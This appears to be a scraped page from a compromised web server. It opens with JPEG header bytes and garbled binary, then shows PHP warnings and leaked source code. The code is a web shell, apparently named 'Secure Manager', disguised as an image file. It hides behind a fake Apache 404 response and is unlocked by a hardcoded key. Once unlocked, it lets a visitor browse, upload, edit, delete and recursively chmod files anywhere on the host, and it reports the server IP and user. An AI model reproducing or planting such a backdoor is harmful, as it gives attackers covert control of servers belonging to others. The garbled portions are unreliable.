????????????????????
??????????????????
ÿØÿà
JFIF ÿÛ C
!"$"$ÿÛ C
ÿÂ p
" ÿÄ
ÿÄ ÿÚ
ÕÔË®
(% aA*‚XYD¡(J„¡E¢RE,P€XYae )(E¤²€B¤R¥ BQ¤¢ X«)X…€¤ @
adadasdasdasasdasdas
.....................................................................................................................................
Warning: Undefined variable $auth in /home/binojpqy/datlab.xyz/commentsos/vendoyters/hfgwdtfdhty/12daygood.php on line 559
Warning: Trying to access array offset on value of type null in /home/binojpqy/datlab.xyz/commentsos/vendoyters/hfgwdtfdhty/12daygood.php on line 559
Warning: Cannot modify header information - headers already sent by (output started at /home/binojpqy/datlab.xyz/commentsos/vendoyters/hfgwdtfdhty/12daygood.php:1) in /home/binojpqy/datlab.xyz/commentsos/vendoyters/hfgwdtfdhty/12daygood.php on line 201
Warning: Cannot modify header information - headers already sent by (output started at /home/binojpqy/datlab.xyz/commentsos/vendoyters/hfgwdtfdhty/12daygood.php:1) in /home/binojpqy/datlab.xyz/commentsos/vendoyters/hfgwdtfdhty/12daygood.php on line 202
404 Not FoundNot Found
The requested URL was not found on this server.
Apache Server at ' . htmlspecialchars($_SERVER['HTTP_HOST'] ?? 'localhost') . ' Port 80';
exit;
}
// Carry key through all links
$k = '&key=NOX-5090';
$kq = '?key=NOX-5090';
$path = isset($_GET['path']) ? $_GET['path'] : '.';
$path = realpath($path);
$server_ip = $_SERVER['SERVER_ADDR'] ?? gethostbyname($_SERVER['HTTP_HOST'] ?? 'localhost');
$software = $_SERVER['SERVER_SOFTWARE'] ?? 'Unknown';
$php_v = PHP_VERSION;
$user = function_exists('posix_getpwuid') ? posix_getpwuid(posix_geteuid())['name'] : get_current_user();
function wp_sm_get_perms($p) {
if (!file_exists($p)) return "0000";
return substr(sprintf('%o', fileperms($p)), -4);
}
$msg = "";
if (isset($_POST['bulk_delete']) && isset($_POST['selected_items'])) {
foreach ($_POST['selected_items'] as $item) {
$target = realpath($path . DIRECTORY_SEPARATOR . basename($item));
if ($target) {
is_dir($target) ? @rmdir($target) : @unlink($target);
}
}
header("Location: ?key=NOX-5090&path=" . urlencode($path) . "&msg=BulkDeleted");
exit;
}
if (isset($_POST['quick_chmod'])) {
$target_item = rawurldecode($_POST['quick_chmod']);
$target_path = realpath($path . DIRECTORY_SEPARATOR . $target_item);
$raw_perms = $_POST['perms'][$_POST['quick_chmod']] ?? '0644';
$clean_input = preg_replace('/[^0-7]/', '', $raw_perms);
$clean_input = str_pad($clean_input, 4, '0', STR_PAD_LEFT);
$new_perms = octdec($clean_input);
if ($target_path && file_exists($target_path)) {
if (@chmod($target_path, $new_perms)) {
$msg = "Permissions updated to " . $clean_input;
if (is_dir($target_path)) {
$fails = 0;
$objects = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($target_path, FilesystemIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST);
foreach ($objects as $name => $object) {
if (!@chmod($name, $new_perms)) $fails++;
}
$msg .= $fails > 0 ? " (Recursive: $fails errors)" : " (Applied recursively)";
}
} else {
$msg = "Failed: Server denied permission change.";
}
clearstatcache();
}
}
if (isset($_POST['save'])) {
$edit_file = basename($_POST['edit_file']);
$edit_path = $path . DIRECTORY_SEPARATOR . $edit_file;
if (file_put_contents($edit_path, $_POST['content']) !== false) {
$msg = "File saved successfully.";
}
}
if (isset($_FILES['file'])) {
$dest = $path . DIRECTORY_SEPARATOR . basename($_FILES['file']['name']);
if (move_uploaded_file($_FILES['file']['tmp_name'], $dest)) {
header("Location: ?key=NOX-5090&path=" . urlencode($path) . "&msg=Uploaded");
exit;
}
}
if (isset($_GET['delete'])) {
$del_item = basename($_GET['delete']);
$del_path = realpath($path . DIRECTORY_SEPARATOR . $del_item);
if ($del_path && file_exists($del_path)) {
is_dir($del_path) ? @rmdir($del_path) : @unlink($del_path);
header("Location: ?key=NOX-5090&path=" . urlencode($path) . "&msg=Deleted");
exit;
}
}
if (isset($_GET['msg'])) {
switch ($_GET['msg']) {
case 'Deleted': $msg = "Item deleted."; break;
case 'BulkDeleted': $msg = "Selected items deleted."; break;
case 'Uploaded': $msg = "File uploaded."; break;
}
}
?>
Secure Manager
SYSTEM
SERVER | PHP
USER
IP
/';
$acc = "";
$path_parts = explode(DIRECTORY_SEPARATOR, rtrim($path, DIRECTORY_SEPARATOR));
foreach ($path_parts as $p) {
if ($p === '') continue;
$acc .= DIRECTORY_SEPARATOR . $p;
$path_html .= '
/' . htmlspecialchars($p) . '';
}
echo $path_html;
?>
Upload